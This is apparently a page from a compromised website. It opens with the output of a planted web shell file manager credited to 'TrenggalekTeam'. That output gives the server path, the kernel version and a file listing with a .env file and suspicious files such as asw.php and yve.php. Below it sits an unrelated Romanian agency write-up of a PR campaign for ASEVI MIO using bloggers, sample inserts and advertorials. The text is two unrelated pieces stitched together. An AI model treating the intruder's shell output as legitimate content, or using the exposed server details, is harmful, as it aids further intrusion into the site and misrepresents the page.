/home/dimp0083/public_html/
Linux bloomcom.designyourfuture.ro 2.6.32-673.26.1.lve1.4.22.el6.x86_64 #1 SMP Fri Feb 24 08:35:09 EST 2017 x86_64
Upload File :

Name
Size
Permissions
Options
.well-known
--
drwxr-xr-x
_old_website
--
drwxr-xr-x
app
--
drwxr-xr-x
bootstrap
--
drwxrwxr-x
config
--
drwxr-xr-x
database
--
drwxr-xr-x
public
--
drwxr-xr-x
resources
--
drwxr-xr-x
storage
--
drwxrwxr-x
tests
--
drwxr-xr-x
vendor
--
drwxr-xr-x
.env
0.485 KB
-rw-r--r--
.env.example
0.515 KB
-rw-r--r--
.gitattributes
0.06 KB
-rw-r--r--
.gitignore
0.109 KB
-rw-r--r--
.htaccess
0.149 KB
-r--r--r--
.user.ini
0.534 KB
-rw-r--r--
app.css
47.012 KB
-rw-r--r--
app.css.map
68.73 KB
-rw-r--r--
artisan
1.607 KB
-rw-r--r--
asw.php
12.639 KB
-rw-r--r--
bdb532
3.482 KB
-rw-r--r--
ceshi.html
0 KB
-rw-r--r--
composer.json
1.726 KB
-rw-r--r--
composer.lock
144.127 KB
-rw-r--r--
database.sqlite
0 KB
-rw-r--r--
error_log
70.873 KB
-rw-r--r--
gulpfile.js
1.808 KB
-rw-r--r--
index.php
46.845 KB
-rw-r--r--
package.json
0.214 KB
-rw-r--r--
php.ini
0.534 KB
-rw-r--r--
phpunit.xml
1.002 KB
-rw-r--r--
pulang.txt
0.206 KB
-rw-r--r--
readme.md
1.899 KB
-rw-r--r--
robots.txt
0.022 KB
-rw-r--r--
server.php
0.554 KB
-rw-r--r--
sitemaps.xml
2.24 KB
-rw-r--r--
wp-config-sample.php
8.293 KB
-rw-r--r--
yve.php
0.294 KB
-rw-r--r--
Coded by : TrenggalekTeam
PONS - Campanie ASEVI MIO – Campanie de awareness

PONS - Campanie ASEVI MIO – Campanie de awareness

Obiectiv: PoziČ›ionarea produsului ASEVI MIO ca fiind aliatul de nadejde al femeii de astazi, superactiva si foarte ocupata, cresterea vizibilitatii produsului in mediul online, cu potential in generarea vanzarilor. Crearea unei imagini pozitive in piata prin oferirea posibilitatii de a testa produsul. 

Tactici: Am creat o campanie de PR in preajma Sarbatorii Craciunului cu scopul de a genera awarness prin insert mostre, advertoriale si activari cu bloggeri.

Activari cu bloggerii - Bloggerii au fost provocati sa testeze produsele din gama casnica ASEVI. Acestia au facut referire, in postarile lor, la experientele proprii legate de curatenia de Sarbatori. Postarile de pe bloguri au fost dublate de prezenta in Social Media. 

Campanie de  inserturi mostre - Am oferit cititoarelor revistelor Click pentru femei si Libertatea pentru femei din Bucuresti si Constanta, posibilitatea de a testa produsul prin insertul cu mostre Asevi Mio. Insertul a fost sustinut de informatii reprezentative, prin intermediul advertorialului full page din ambele reviste. Advertorialele  au fost prezent in tirajul revistelor de la nivel national.

Campanie de advertoriale - Pentru o comunicare eficienta si focusata, au fost selectate cele mai citite reviste de lifestyle feminin, potrivite publicului tinta Asevi Mio.



Semnatura